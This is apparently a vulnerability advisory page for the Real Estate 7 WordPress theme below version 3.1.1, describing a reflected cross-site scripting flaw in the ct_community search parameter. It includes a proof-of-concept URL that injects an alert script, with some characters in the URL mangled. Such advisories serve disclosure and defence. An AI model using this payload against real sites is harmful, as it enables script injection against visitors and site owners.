logo
DATABASE RESOURCES PRICING ABOUT US

Real Estate 7 < 3.1.1 - Reflected Cross-Site Scripting (XSS)

Description

The theme did not properly sanitise the ct_community parameter in its search listing page before outputting it back in it, leading to a reflected Cross-Site Scripting which can be triggered in both unauthenticated or authenticated user context ### PoC https://example.com/?ct_mobile_keyword&ct;_keyword&ct;_city&ct;_zipcode&search-listings;=true&ct;_price_from&ct;_price_to&ct;_beds_plus&ct;_baths_plus&ct;_sqft_from&ct;_sqft_to&ct;_lotsize_from&ct;_lotsize_to&ct;_year_from&ct;_year_to&ct;_community=%3Cscript%3Ealert(document.domain);%3C/script%3E&ct;_mls=&ct;_brokerage=0⪫&lng;


Affected Software


CPE Name Name Version
realestate-7 3.1.1

Related